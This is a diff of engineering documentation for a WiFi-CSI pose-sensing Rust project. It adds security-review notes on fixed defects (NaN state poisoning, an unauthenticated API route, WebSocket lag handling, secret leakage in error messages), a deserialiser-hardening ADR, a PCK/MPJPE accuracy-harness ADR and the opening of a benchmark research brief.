The ADR-141 control plane (`PrivacyMode`/`PrivacyModeRegistry`) is **not yet wired into the emit path** — the emitter/pipeline enforce the raw `PrivacyClass` directly; the registry is exported + unit-tested but advisory. This matches the "Integration glue — not yet on the live path" status above. The class-byte enforcement (emitter + event + renderers + the now-fixed `process_to_frame`) is the live guarantee. Wiring the registry is the documented next step.
|
||||
|
||||
@@ -253,6 +253,54 @@ Validation per CLAUDE.md: `cargo test --workspace --no-default-features` green;
|
||||
|
||||
---
|
||||
|
||||
## 6. Review notes
|
||||
|
||||
### 6.1 Correctness + security review (2026-06-14)
|
||||
|
||||
Beyond-SOTA correctness+security review of `wifi-densepose-calibration` (this
|
||||
ADR's pipeline), un-covered by the ADR-154–159 sweep.
|
||||
|
||||
**Finding (FIXED) — NaN-poisoning of the feature path (numerical / fail-closed).**
|
||||
`Features::from_series` — the carrier for both live inference and training-anchor
|
||||
extraction — computed `mean`/`variance`/`motion` over the raw scalar series with
|
||||
no non-finite guard. A single `NaN`/`±inf` sample (corrupt CSI frame) yielded
|
||||
`mean=NaN, variance=NaN` and an all-`NaN` prototype embedding. Persisted into a
|
||||
`PresenceSpecialist::threshold`/`empty_mean` at train time, the `NaN` **silently
|
||||
disabled presence detection** for the bank's lifetime (every `>` / `|·|`
|
||||
comparison against `NaN` is false → always reads *absent*, confidence 0), with no
|
||||
error — and an asymmetry against the rigorously NaN-guarded `geometry_embedding`.
|
||||
Fixed at the production boundary: non-finite samples are dropped (a corrupt frame
|
||||
counts as no frame), an all-non-finite series degrades to `Features::ZERO` like
|
||||
the empty series. Value-identical for all-finite input (full-loop + extract tests
|
||||
unchanged); pinned by `non_finite_samples_do_not_poison_features` and
|
||||
`all_non_finite_series_is_zero` (both fail on the old code).
|
||||
|
||||
**Clean dimensions (evidence, no invented issues).**
|
||||
- *File/path handling:* the crate performs **zero** file/path I/O (no
|
||||
`std::fs`/`Path`/`File`/`read`/`write` in `src/`; only in-memory `serde_json`).
|
||||
Path-traversal / unbounded-read / artifact-path handling live entirely in the
|
||||
`wifi-densepose-cli` consumer (`room.rs`), outside this crate's boundary.
|
||||
- *Untrusted-load:* `SpecialistBank::from_json` shape-validates via serde
|
||||
(malformed → `CalibrationError::Serde`); banks are local-first (invariant B),
|
||||
never network-received. A well-formed bank with adversarial numerics is trusted
|
||||
as-is — acceptable under the local-first threat model; a validate-on-load
|
||||
defense-in-depth pass is a possible future hardening, not a present bug.
|
||||
- *Receipt/hash integrity:* the crate emits no hash/receipt/witness/signature, so
|
||||
the unframed-concatenation bug class (cf. the engine `witness_of` fix) is
|
||||
structurally absent.
|
||||
- *Other numerical paths:* `geometry_embedding` sanitizes every input and sweeps
|
||||
to finite; presence/restlessness/anomaly divisions are `.max(1e-3)`-guarded;
|
||||
`autocorr_dominant` guards `r0`, short signals, and empty bands; `train` rejects
|
||||
empty anchors; anomaly requires ≥2 anchors.
|
||||
|
||||
De-magicked the bare specialist threshold literals (breathing/heartbeat default
|
||||
min-scores, anomaly outlier-spread multiple + label cutoff) into named documented
|
||||
consts, value-identical, pinned by const-equality tests. Tests
|
||||
**58→62 unit + 1 integration, 0 failed**; Python deterministic proof unchanged
|
||||
(off the signal proof path).
|
||||
|
||||
---
|
||||
|
||||
## 5. Summary
|
||||
|
||||
> Big models understand the world. Small ruVector models understand *your room*.
|
||||
|
||||
@@ -231,6 +231,8 @@ Catalogued so nothing is silently dropped. Priority: **P1** correctness-adjacent
|
||||
|
||||
> **Horizon-ledger one-liner.** Milestone-0 DONE: dead CIR gate (FIXED+proved), NaN/inf adversarial bypass (FIXED+proved), divide-by-(n−1) window trio (FIXED+proved), calibration dead-branch (FIXED), PSD FFT-planner cache (MEASURED), DTW band (MEASURED). **Milestone-1 DONE (2026-06-13): all four P1 backlog items cleared — circular phase variance #1 (RESOLVED/MEASURED metric, DATA-GATED threshold), Welford n=0 guard #10 (RESOLVED/MEASURED), threshold magic-constants #9 & #13 (RESOLVED-PARTIAL/DATA-GATED — de-magicked + boundary-tested, values unchanged).** **Milestone-2 DONE (2026-06-13): bench-first P2 perf subset + missing boundary tests cleared — spectrogram per-subcarrier FFT re-plan #20 (MEASURED-HOT, 1.40–1.84×, bit-identical); attention/tomography/Kalman #5/#6/#7 (MEASURED-NULL — benched, not hot, left as-is); field_model eigendecompose #8 (MEASUREMENT-ONLY, BLAS un-buildable on this Windows host, number deferred to a BLAS box, NOT fabricated); fft_operator tolerance #14, phase-align convergence-cap #16, csi-ratio epsilon #19 (RESOLVED, tests added).** **Milestone-3 DONE (2026-06-13): the lumped §7.4 row #21–45 P3 backlog cleared, and with it residual P3 items #2/#12/#17/#18 — 22 magic constants de-magicked into named EMPIRICAL-DEFAULT consts (each pinned == prior literal) + 6 boundary/characterization tests across 11 modules; ~4 doc-only; not-real findings (unreachable attractor_drift div0, non-existent gesture thresholds, proof-path features.rs) reported + skipped, no churn; no operating value changed; workspace 3,275/0, Python proof bit-exact `f8e76f21…`.** **§7.4 deferred backlog is now FULLY CLEARED across M0–M3 — nothing silently dropped.**
|
||||
|
||||
> **Sibling-crate sweep extension (2026-06-14) — `wifi-densepose-geo` + `wifi-densepose-pointcloud`.** The ADR-154-class numerical-robustness sweep (non-finite-input-poisons-persistent-state + divide-by-zero / asin-domain / degenerate-geometry) was extended to two crates *outside* this ADR's signal scope. **Two real `geo` bugs FIXED, each fails-on-old-pinned:** `terrain.rs::parse_hgt` usize-underflow panic on empty/sub-2x2 SRTM data (`1.0/(side-1)` → panic in debug / inf `cell_size_deg` poisoning `ElevationGrid::get` in release — a truncated download / 404 HTML body reaches it; now `bail!`s when `side < 2`); `coord.rs::haversine` `asin(>1)→NaN` for near-antipodal points (`h` rounds to `1.0+4e-16`; clamped to `[0,1]`). The ±90° pole `cos(lat)=0` ENU singularity is pinned no-panic without changing the transform. **`pointcloud` is confirmed-robust (no manufactured finding):** its only persistent auto-accumulating state (`occupancy` EMA + vitals) is fed solely by the integer-rssi/`sqrt`/`atan2` parser (always finite) and is provably self-healing even under an adversarial NaN/inf `CsiFrame` (`motion_score=(NaN/100).min(1.0)→1.0`; breathing `→0→clamp(5,40)→5.0`) — pinned by `nonfinite_frame_does_not_poison_persistent_state` + degenerate-voxel-fusion no-panic tests. `geo` 9→15 lib / 8 integration; `pointcloud` 18→22; 0 failed; workspace green; Python proof bit-exact `f8e76f21…`. See CHANGELOG `[Unreleased] → Fixed`.
|
||||
|
||||
---
|
||||
|
||||
## 8. Consequences
|
||||
|
||||
@@ -265,3 +265,74 @@ Result at time of writing (all 0 failed):
|
||||
perform (B5).
|
||||
- Files kept under the 500-line guideline (`engine.rs` 462; behavioral tests
|
||||
moved to `tests/engine_behaviors.rs`).
|
||||
|
||||
## Addendum — `homecore-api` follow-up security review (beyond-SOTA pass)
|
||||
|
||||
A later network-facing review of `homecore-api` (the remote REST + WS attack
|
||||
surface) — independent of the ADR-154–159 sweep — found and fixed two real
|
||||
issues the original M7 pass (which focused on the WS auth bypass HC-WS-01, the
|
||||
reply-theater HC-WS-02, and the bin token provisioning HC-WS-08) did not catch.
|
||||
Both are LOW severity and reported at true severity.
|
||||
|
||||
### HC-API-AUTH-01 — `GET /api/` was unauthenticated (FIXED)
|
||||
|
||||
`rest::api_root` took no headers and unconditionally returned
|
||||
`200 {"message":"API running."}`, while every sibling route gates on
|
||||
`BearerAuth::from_headers`. HA's `APIStatusView` inherits `requires_auth = True`,
|
||||
so `/api/` must return **401** for a missing/wrong bearer. HA clients use the
|
||||
status route as a token-validation probe; a 200 told a bad-token client its
|
||||
token was valid and let an unauthenticated party confirm a live endpoint.
|
||||
LOW severity (the body is a static string; no entity/state data leaks).
|
||||
|
||||
**Fix:** `api_root(headers, State)` now validates the bearer like `get_config`.
|
||||
**Pinned by** (fail-on-old, `tests/server_bin_auth.rs`):
|
||||
`api_root_rejects_missing_bearer`, `api_root_rejects_wrong_bearer` (both 200→401),
|
||||
guarded by `api_root_accepts_correct_bearer` (still 200 with a valid token).
|
||||
|
||||
### HC-WS-LAG-01 — `subscribe_events` killed the stream on a broadcast lag (FIXED)
|
||||
|
||||
The per-subscription task matched `Err(_) => break` on both broadcast
|
||||
`recv()` arms. `RecvError::Lagged(n)` (a slow consumer falling
|
||||
>`EVENT_CHANNEL_CAPACITY` = 4,096 events behind) is **recoverable** — the bus
|
||||
doc says "Lagged receivers must re-sync" and HA keeps the subscription alive
|
||||
across a lag. The old code treated the first lag as fatal, so after an event
|
||||
burst the client's stream went permanently silent with no error frame — a
|
||||
self-inflicted event-delivery DoS under load.
|
||||
|
||||
**Fix:** `Lagged(_) => continue` (skip the dropped window, re-sync),
|
||||
`Closed => break`, on both the system and domain arms of the `select!`.
|
||||
**Pinned by** `subscription_survives_broadcast_lag` (`tests/ws_handshake.rs`):
|
||||
subscribes to a filtered event type, floods 6,000 unrelated events past the
|
||||
4,096 capacity to force a `Lagged`, then asserts a subsequent subscribed event
|
||||
is still delivered (old code: 5s-timeout panic).
|
||||
|
||||
### Dimensions confirmed clean (with evidence)
|
||||
|
||||
- **AuthN/AuthZ** — all 7 other REST handlers gate on `BearerAuth::from_headers`
|
||||
→ `LongLivedTokenStore::is_valid` before any work; the WS handshake validates
|
||||
the `auth` token against the same store before the command loop, and
|
||||
privileged commands are unreachable pre-`auth_ok`. Token compare is
|
||||
`HashSet::contains` (content-independent timing — not the byte-`==` oracle of
|
||||
ADR-157 §B4), so no timing-oracle finding. No route skips the gate; no
|
||||
result-ignored check; no default/empty token accepted.
|
||||
- **Path traversal** — no route maps user input to a filesystem path (state is an
|
||||
in-memory `DashMap`); `:entity_id` passes through `EntityId::parse`, a strict
|
||||
`[a-z0-9_]+\.[a-z0-9_]+` ASCII allowlist that rejects `..`, `/`, `\`, and
|
||||
absolute paths. No traversal surface.
|
||||
- **Injection** — no SQL, no shell/subprocess, no `format!`-into-response;
|
||||
service/state bodies are typed `serde_json::Value` handed to the in-process
|
||||
registry (HA-equivalent).
|
||||
- **Info-leak** — `ApiError` maps to fixed status + a typed `{message}`;
|
||||
`ServiceError::HandlerFailed(String)` is integration-controlled (HA surfaces
|
||||
the handler error too), never framework internals/paths/stack-traces — no
|
||||
ADR-080-class leak.
|
||||
- **CORS** — explicit allowlist with `allow_credentials(false)` (HC-05),
|
||||
not `permissive()`.
|
||||
- **De-magic** — no bare security-relevant literals in the crate worth
|
||||
extracting (`EVENT_CHANNEL_CAPACITY` is already named in `homecore`; CORS
|
||||
dev-default ports are documented).
|
||||
|
||||
**Tests:** `homecore-api --no-default-features` **25 → 29** (+2 api-root auth,
|
||||
+1 api-root accept-guard, +1 WS lag-survival), 0 failed. Workspace green.
|
||||
Python deterministic proof unchanged (homecore-api is off the signal proof
|
||||
path).
|
||||
|
||||
@@ -78,6 +78,23 @@ converts the entity registry; full conversion of the remaining artifacts is defe
|
||||
|
||||
- `MigrateError` carries context (`path`, line/field) for I/O, JSON, YAML, missing-field,
|
||||
unsupported-schema-version, and entity-id parse failures (`src/lib.rs`).
|
||||
- **Secret-leak hardening (security review, 2026-06).** `secrets.yaml` parse failures must
|
||||
NOT use the generic `MigrateError::YamlParse { source }` variant: `serde_yaml`'s message
|
||||
for a typed-tag coercion error (e.g. `port: !!int <value>`) embeds the offending scalar
|
||||
verbatim (`invalid value: string "<the-secret-value>"`), and that error propagates through
|
||||
the `InspectSecrets` CLI path to stderr — leaking a secret value despite the CLI's
|
||||
deliberate `<redacted>` design. `read_secrets` now maps such failures to a dedicated
|
||||
redacting variant `MigrateError::SecretsParse { path, line, column }` that carries only the
|
||||
file path and a coarse location (`serde_yaml::Error::location()`), never the scalar content.
|
||||
Pinned by `secrets::tests::malformed_secrets_error_never_contains_secret_value` (asserts the
|
||||
rendered error **and its full `#[source]` chain** never contain the secret value).
|
||||
**Review dimensions confirmed clean with evidence:** source is never mutated (no
|
||||
`fs::write`/`remove`/`create` anywhere — P1 reads source, writes nothing); paths are
|
||||
user-supplied dirs joined with fixed filenames (no `..`/absolute traversal beyond the
|
||||
user's own privileges); malformed/typed/truncated `.storage` JSON and YAML **error, never
|
||||
panic** (every production `unwrap`/`expect` is test-only); unknown schema `minor_version`
|
||||
hard-errors fail-closed; no SQL/shell/path injection surface (the tool emits diagnostics
|
||||
only, persists nothing in P1).
|
||||
|
||||
### 2.5 Deferred to P2+ (NOT built — honestly labelled)
|
||||
|
||||
@@ -89,7 +106,9 @@ converts the entity registry; full conversion of the remaining artifacts is defe
|
||||
|
||||
### 2.6 Test evidence (as shipped)
|
||||
|
||||
- 19 tests (`cargo test -p homecore-migrate`), per the crate README badge.
|
||||
- 21 tests (`cargo test -p homecore-migrate`) — 19 as originally shipped plus 2 added by the
|
||||
2026-06 security review (`secrets::tests::malformed_secrets_error_never_contains_secret_value`,
|
||||
`malformed_secrets_error_reports_location`).
|
||||
|
||||
## 3. Consequences
|
||||
|
||||
|
||||
@@ -0,0 +1,117 @@
|
||||
# ADR-172: `wifi-densepose-cli` + `wifi-densepose-core` CSI-Deserialiser Security Review
|
||||
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| **Status** | Accepted — clean-with-evidence, 4 regression pins added |
|
||||
| **Date** | 2026-06-15 |
|
||||
| **Deciders** | ruv |
|
||||
| **Codename** | **CSI-DESERIALISER-HARDENING** |
|
||||
| **Supersedes / amends** | none (records review; references ADR-127 §9 for the `core` portion, ADR-136 for the pre-existing DoS ACs) |
|
||||
|
||||
## Context
|
||||
|
||||
The beyond-SOTA security sweep (branch `feat/v2-beyond-sota-sweep`) reviewed each
|
||||
`v2/` crate for real, reproducible defects. Two crates had no prior dedicated
|
||||
security ADR:
|
||||
|
||||
- **`wifi-densepose-core`** — the dependency root for all 12 downstream crates
|
||||
(types, traits, error types, CSI frame primitives). A defect here is a
|
||||
force-multiplier: every consumer inherits it.
|
||||
- **`wifi-densepose-cli`** — the user-facing entrypoint
|
||||
(`calibrate`/`calibrate-serve`/`enroll`/`train-room`/`room-watch` + MAT-gated),
|
||||
which parses untrusted UDP CSI packets and operator-supplied paths.
|
||||
|
||||
A **specific hypothesis** motivated the core review. Three earlier reviews in
|
||||
this campaign found a systemic **NaN-state-poisoning bug class** in crates that
|
||||
depend on core (`wifi-densepose-calibration`, `-vitals`, `-geo`): a non-finite
|
||||
(NaN/Inf) input latched into persistent filter/accumulator state (IIR `y1/y2`,
|
||||
running mean, Welford/von-Mises accumulator, voxel grid) → silent **permanent**
|
||||
feature failure. The load-bearing question for this review: **does that bug class
|
||||
originate in a shared `wifi-densepose-core` primitive** (making the right fix a
|
||||
single root fix), or was it independently re-implemented in each downstream
|
||||
crate (making the three existing local fixes complete)?
|
||||
|
||||
## Decision
|
||||
|
||||
Record the review outcome and lock in the existing DoS guards with regression
|
||||
tests. **No production code is changed** — both crates were already hardened
|
||||
(ADR-136 acceptance criteria + `sanitize_room_id`); the gap was *untested*
|
||||
guards, which a future refactor could silently remove.
|
||||
|
||||
### Load-bearing question — VERDICT: **NO** (the NaN class does not live in core)
|
||||
|
||||
`wifi-densepose-core` exposes **no stateful accumulator of any kind** — no
|
||||
Welford/running-mean, no von-Mises/circular-mean, no IIR/biquad filter state, no
|
||||
voxel grid.
|
||||
|
||||
- **MEASURED:** `grep` over `core/src` for
|
||||
`welford|von_mises|biquad|y1|y2|running_mean|accumulat|voxel|self.*+=` matched
|
||||
only the `InvalidState` *error* enum variant, "reset state" doc comments, and a
|
||||
test-only LCG — **zero** stateful logic. The only float math in core is
|
||||
construction-time projection (`CsiFrame::new` → amplitude/phase via `mapv`) and
|
||||
pure stateless `utils` functions; nothing persists across frames.
|
||||
- **Corroboration:** `wifi-densepose-calibration::Features::from_series`
|
||||
(`extract.rs:103–133`) already filters non-finite samples → `Features::ZERO`.
|
||||
The downstream fixes are independently re-implemented, confirming each crate
|
||||
rolls its own accumulator and each local fix is correct and complete. **A fix
|
||||
in core would be a no-op (there is nothing to fix).**
|
||||
|
||||
Consequence: the NaN-state-poisoning class is a *downstream-local* pattern, not a
|
||||
core-rooted defect. No hidden fourth instance exists in the shared primitive.
|
||||
|
||||
### Findings (all pins — guards already present, now tested)
|
||||
|
||||
| # | Location | Guard (pre-existing) | Regression pin | Evidence (MEASURED) |
|
||||
|---|----------|----------------------|----------------|---------------------|
|
||||
| 1 | `core` `types.rs:801` `from_canonical_bytes` | `saturating_mul` shape-vs-length check before `Vec::with_capacity(rows*cols)` | `canonical_decode_oversized_shape_is_bounded_not_allocated` | With guard removed: **panics `capacity overflow` at `types.rs:801`**; with guard: passes |
|
||||
| 2 | `core` `types.rs` decoder | typed `CanonicalDecodeError`, never panics | `canonical_decode_never_panics_on_arbitrary_bytes` (fuzz sweep) | panic-free on arbitrary bytes |
|
||||
| 3 | `cli` `calibrate.rs:276–291` | length check `buf.len() < 20 + n_pairs*2` before `Array2::zeros(n_antennas*n_subcarriers)` | `test_parse_csi_packet_oversized_claim_is_rejected_not_allocated` | 255×65535 claim in a 2 KB packet → `None` (no allocation) |
|
||||
| 4 | `cli` `calibrate.rs` parser | `None`-returning on malformed input | `test_parse_csi_packet_never_panics_on_arbitrary_bytes` (fuzz sweep) | panic-free on arbitrary UDP bytes |
|
||||
|
||||
### Dimensions confirmed clean (with evidence)
|
||||
|
||||
1. **Panic-on-adversarial-input = 0** — `from_canonical_bytes` returns a typed
|
||||
error for every malformed class; `parse_csi_packet` returns `None`. Both
|
||||
fuzz-swept panic-free.
|
||||
2. **NaN handling** — `Confidence::new` rejects NaN
|
||||
(`!(0.0..=1.0).contains(&NaN)` ⇒ `Err`); `compute_bounding_box` /
|
||||
`to_flat_array` are NaN-tolerant (f32 min/max ignore NaN).
|
||||
3. **Empty-frame safety** — `amplitude_variance` / `mean_amplitude` are
|
||||
panic-free on an empty `Array2` (ndarray 0.17 returns finite / `None`).
|
||||
4. **Unbounded-memory DoS** — bounded in both deserialisers (findings 1 & 3).
|
||||
5. **Path traversal** — `calibrate-serve` defends every client-supplied
|
||||
`room_id`/`bank`/`baseline` via `sanitize_room_id` (`[A-Za-z0-9_-]`, 64-char
|
||||
cap) with existing tests; bearer-auth gate + non-loopback-bind warning present.
|
||||
`mat export` writes to an operator-supplied `PathBuf` (acceptable CLI behavior).
|
||||
6. **Secrets** — `--token` is read from `CALIBRATE_TOKEN` env, never embedded.
|
||||
|
||||
## Validation
|
||||
|
||||
- `cargo test -p wifi-densepose-core` → **35 → 37** lib passed, 0 failed (+3 doctests)
|
||||
- `cargo test -p wifi-densepose-cli --no-default-features` → **24 → 26** passed, 0 failed
|
||||
- `cargo test --workspace --no-default-features` → **exit 0**, 0 failed
|
||||
- `python archive/v1/data/proof/verify.py` → **VERDICT: PASS**, hash
|
||||
`f8e76f21a0f9852b70b6d9dd5318239f6b20cbcb4cdd995863263cecdc446f7a` **unchanged**
|
||||
(core/cli are off the signal proof path — confirms no pipeline alteration)
|
||||
|
||||
## Consequences
|
||||
|
||||
### Positive
|
||||
- Two CSI deserialisers (the untrusted-input boundary of both the library root
|
||||
and the network-facing CLI) now have their DoS guards pinned against
|
||||
regression — a future refactor that drops a length check fails CI.
|
||||
- The NaN-state-poisoning class is settled as downstream-local; reviewers no
|
||||
longer need to suspect a shared-root defect, and the three prior local fixes
|
||||
are confirmed complete.
|
||||
|
||||
### Negative
|
||||
- None. Test-only change; no behavior or API change.
|
||||
|
||||
### Neutral
|
||||
- The `core` portion is also noted in ADR-127 §9 (shared security-review log);
|
||||
this ADR is the canonical record for the `wifi-densepose-cli` review.
|
||||
|
||||
## Links
|
||||
- ADR-127 — HOMECORE state machine (shared security-review log, §9)
|
||||
- ADR-136 — pre-existing CSI deserialiser DoS acceptance criteria
|
||||
- ADR-151 — per-room calibration (`calibrate`/`calibrate-serve` surfaces)
|
||||
@@ -0,0 +1,123 @@
|
||||
# ADR-173: Metric-Locked PCK/MPJPE Accuracy Harness
|
||||
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| **Status** | Accepted — implemented, deterministically tested |
|
||||
| **Date** | 2026-06-15 |
|
||||
| **Deciders** | ruv |
|
||||
| **Codename** | **METRIC-LOCK** |
|
||||
| **Amends** | ADR-155 (generalizes the torso-only `metrics_core::pck_canonical` to a selectable normalization) |
|
||||
| **Motivated by** | `docs/research/sota-nn-train-benchmark-brief.md` (PR #1090) |
|
||||
|
||||
## Context
|
||||
|
||||
The beyond-SOTA SOTA-research brief (PR #1090) identified the single biggest
|
||||
threat to any "beyond-SOTA" accuracy claim this project makes: **metric
|
||||
ambiguity**. Three PCK@20 numbers circulate, computed under three *different and
|
||||
unstated* normalizations, so they cannot be compared:
|
||||
|
||||
- **96.09–96.61%** — WiFlow-STD reproduction, **image/bounding-box-normalized** PCK (the looser convention).
|
||||
- **81.63%** — an internal MM-Fi number reported as **"torso-PCK"** (tighter).
|
||||
- **61.1%** — GraphPose-Fi (arXiv 2511.19105), **standard torso-diameter** PCK on the MM-Fi random split (the academic frontier).
|
||||
|
||||
The project has been burned by this twice: a previously-published 92.9% was
|
||||
retracted because it used **absolute-pixel** normalization, not torso. Until
|
||||
there is *one canonical, documented, tested* PCK definition — and every reported
|
||||
number carries the definition it was computed under — no accuracy comparison is
|
||||
credible, and the "prove everything" bar cannot be met for the benchmark half of
|
||||
the work.
|
||||
|
||||
This is measurement infrastructure, not an accuracy claim. The deliverable's job
|
||||
is to make the metric **unambiguous and reproducible**, so future numbers are
|
||||
comparable and an unlabeled PCK is structurally impossible.
|
||||
|
||||
## Decision
|
||||
|
||||
Add a metric-locked accuracy harness as a new module
|
||||
`v2/crates/wifi-densepose-train/src/accuracy.rs` (404 non-test lines; inline
|
||||
deterministic tests bring the file to 708), re-exported at the crate root. It
|
||||
**extends, not duplicates** — it reuses `metrics_core`'s geometric primitives
|
||||
(`bounding_box_diagonal`, canonical hip indices `CANON_LEFT_HIP/RIGHT_HIP`), so
|
||||
there remains exactly one implementation of each geometric reference; the
|
||||
existing ADR-155 `pck_canonical` (torso-only) is unchanged and this generalizes
|
||||
it.
|
||||
|
||||
### Public API
|
||||
|
||||
- `enum PckNormalization { TorsoDiameter, BoundingBoxDiagonal, AbsolutePixels(f32) }`
|
||||
— the three conventions the three historical numbers used, now **explicit and
|
||||
selectable**. `.label()` / `.tolerance(...)`.
|
||||
- `pck_at(pred, gt, vis, k, norm) -> (correct, total, pck)` — PCK@k =
|
||||
fraction of *visible* keypoints whose predicted-vs-GT distance ≤ the tolerance,
|
||||
where tolerance = `k%` of the chosen normalizer (or an absolute threshold for
|
||||
`AbsolutePixels`).
|
||||
- `mpjpe(pred, gt, vis) -> f32` — mean per-joint position error (2D/3D, coordinate
|
||||
units; mm for mm inputs). Re-exported crate-root as `pck_mpjpe` to avoid
|
||||
colliding with the existing `eval::mpjpe`.
|
||||
- `struct PoseAccuracy { pck_at: BTreeMap<u8,f32>, mpjpe, normalization, n_keypoints, n_frames }`
|
||||
— **a reported number always carries its `normalization`**; an unlabeled PCK is
|
||||
structurally impossible to produce through this surface.
|
||||
- `struct PoseFrame { pred, gt, visibility }` + `accuracy_report(frames, ks, norm) -> PoseAccuracy`
|
||||
(micro-averaged over keypoints).
|
||||
|
||||
### Correctness is proven by hand-computed deterministic tests (no GPU, no data)
|
||||
|
||||
The tests construct synthetic keypoint sets whose PCK/MPJPE can be computed by
|
||||
hand, and assert the harness matches. Highlights (all pass):
|
||||
|
||||
| Test | Construction | Expected |
|
||||
|------|--------------|----------|
|
||||
| perfect_prediction | pred==gt | PCK=1.0 (all 3 norms), MPJPE=0 |
|
||||
| all_just_outside | every error just past τ@20 | PCK=0.0 |
|
||||
| half_in_half_out | 2 exact, 2 just outside | PCK=0.5 |
|
||||
| **three_normalizations (KEY PROOF)** | identical pred; nose err .06, shoulder .10, hips exact | torso=**0.50**, bbox=**1.00**, abs(.08)=**0.75** |
|
||||
| mpjpe_2d / mpjpe_3d | (3,4)→5 / (1,2,2)→3 | 2.5 / 3.0 |
|
||||
| mpjpe_excludes_invisible | invisible joint err 100 ignored | 5.0 |
|
||||
| zero_torso_unscoreable | coincident hips | `(0,0,0.0)`, **not** false-perfect |
|
||||
| no_visible_keypoints | vis=∅ | `(0,0,0.0)` |
|
||||
| nan_coords | one NaN pred coord | counted wrong, **no panic** |
|
||||
| empty report | no frames | 0.0, **not** NaN |
|
||||
| bbox≥torso ordering | same frames | bbox-PCK ≥ torso-PCK |
|
||||
|
||||
### The key proof (the ambiguity is real and quantified)
|
||||
|
||||
Identical predictions, three declared normalizations → **0.50 / 1.00 / 0.75**.
|
||||
Mechanism: the bbox diagonal `√(0.20² + 0.80²) = 0.825` is ~4× the hip-span torso
|
||||
`0.20`, so τ@20 is 0.165 (bbox) vs 0.040 (torso) — the looser image-normalized
|
||||
convention passes joints the strict torso convention rejects. This is *exactly*
|
||||
why 96% / 81.6% / 61% cannot be lined up without declaring the enum, demonstrated
|
||||
in-code.
|
||||
|
||||
## Validation
|
||||
|
||||
- `cargo test -p wifi-densepose-train --no-default-features` → lib **191 → 206**
|
||||
(+15), `test_metrics` **12 → 14** (+2), doc-tests 8 — **0 failed**.
|
||||
- `cargo test --workspace --no-default-features` → **exit 0**, 0 failed.
|
||||
- `python archive/v1/data/proof/verify.py` → **VERDICT: PASS**, hash
|
||||
`f8e76f21a0f9852b70b6d9dd5318239f6b20cbcb4cdd995863263cecdc446f7a` **unchanged**
|
||||
(off the signal proof path — confirms no pipeline alteration).
|
||||
|
||||
## Consequences
|
||||
|
||||
### Positive
|
||||
- The three historical PCK numbers can now be **recomputed under one declared
|
||||
definition** and compared honestly. The retracted-number class of error
|
||||
(silent normalization mismatch) is structurally prevented going forward.
|
||||
- Establishes the measurement substrate for the beyond-SOTA target: GraphPose-Fi
|
||||
cross-environment **PCK@20 = 12.9%** (standard torso PCK) is now a number this
|
||||
harness can produce comparably.
|
||||
|
||||
### Negative
|
||||
- None functional. The harness is additive; no existing metric path changed.
|
||||
|
||||
### Neutral
|
||||
- Producing actual model numbers under this harness requires the trained models +
|
||||
datasets (MM-Fi) and, for cross-domain splits, is the next sub-deliverable of
|
||||
the benchmark/optimization milestone — out of scope here (this ADR is the
|
||||
*instrument*, not the *reading*).
|
||||
|
||||
## Links
|
||||
- ADR-155 — metric core (`pck_canonical`, torso-only) — generalized here
|
||||
- ADR-152 — WiFi-Pose SOTA 2026 intake / WiFlow-STD benchmark
|
||||
- `docs/research/sota-nn-train-benchmark-brief.md` — the motivating gap analysis
|
||||
- GraphPose-Fi — arXiv 2511.19105 (verified cross-env PCK@20 = 12.9% anchor)
|
||||
@@ -0,0 +1,147 @@
|
||||
# SOTA Evidence Brief — `wifi-densepose-nn` / `wifi-densepose-train` Benchmark ADR Seed
|
||||
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| **Date** | 2026-06-14 |
|
||||
| **Author** | deep-research (Opus) |
|
||||
| **Purpose** | Seed a future benchmark/optimization ADR for the NN-inference (`wifi-densepose-nn`) and training (`wifi-densepose-train`) crates |
|
||||
| **Scope** | The DELTA beyond what ADR-152 / ADR-150 / ADR-015 already establish — current published WiFi-CSI pose SOTA, winning architectures, edge-quantization SOTA, and a defensible benchmark-suite design |
|
||||
| **Ethos** | Every claim graded PEER-REVIEWED / PREPRINT / VENDOR-CLAIM / BLOG, with MEASURED-on-public-benchmark distinguished from marketing. Numbers that could not be verified are flagged. No fabricated citations. |
|
||||
|
||||
> **Citation discipline carried in from ADR-152 §2.2:** preprint accuracy numbers are CLAIMED until reproduced on our hardware. The project has already retracted its own "92.9% PCK@20" and "shipped-WiFlow-STD 97.25%" figures after measurement; this brief inherits that bar.
|
||||
|
||||
---
|
||||
|
||||
## 1. Executive summary
|
||||
|
||||
**Where the project stands vs the 2026 frontier.** The repo is, by the evidence already in-tree, *ahead of most academic groups on benchmark hygiene* and roughly *at parity on capability* — but the two are measured on incompatible yardsticks, which is the single biggest risk to any "beyond-SOTA" claim.
|
||||
|
||||
- The project's headline reproductions (`benchmarks/wiflow-std/RESULTS.md`) are MEASURED and rigorous: WiFlow-STD retrained to **96.09–96.61% PCK@20** on the authors' own 360k-window 2D dataset (RTX 5080), shipped checkpoint REFUTED, dataset/code defects documented. This is a genuinely strong, reproducible result.
|
||||
- **But that number is not on a standard public benchmark.** WiFlow-STD's dataset is self-collected (5 subjects, 15 keypoints, 2D, in-domain random split, hardware unspecified). The academic frontier on the *standard* public 3D benchmark (MM-Fi) reports **PCK@20 ≈ 61% / MPJPE ≈ 161 mm random-split** (GraphPose-Fi, Nov 2025) — a *harder* metric (3D, mm-scale, standard PCK normalization). The project's own AetherArena MM-Fi number (**81.63% torso-PCK@20 in-domain**, ADR-150) uses a *torso-normalized PCK* that is looser than GraphPose-Fi's standard PCK, so the three numbers (96% / 81.6% / 61%) **cannot be lined up** without a unified harness. Making them comparable IS the highest-value work item.
|
||||
- The deployment frontier — **cross-subject / cross-environment generalization** — is where everyone collapses, the project included (ADR-150: 81.63% in-domain → ~11.6% leakage-free cross-subject). GraphPose-Fi independently confirms the cliff (61.1% random → 12.9% cross-environment PCK@20). This is the real research target, not in-domain PCK.
|
||||
|
||||
**Top 3 highest-value optimization/benchmark targets:**
|
||||
|
||||
1. **A unified, metric-locked accuracy harness in `wifi-densepose-train`** that scores any model under *one* explicit PCK definition (normalization, keypoint convention, split) so WiFlow-STD-repro, AetherArena/MM-Fi, and GraphPose-Fi numbers become directly comparable. Without this, no "beyond-SOTA" claim survives the "prove it" bar — the project has already been burned twice by metric ambiguity (the retracted 92.9% used absolute, not torso-normalized, PCK).
|
||||
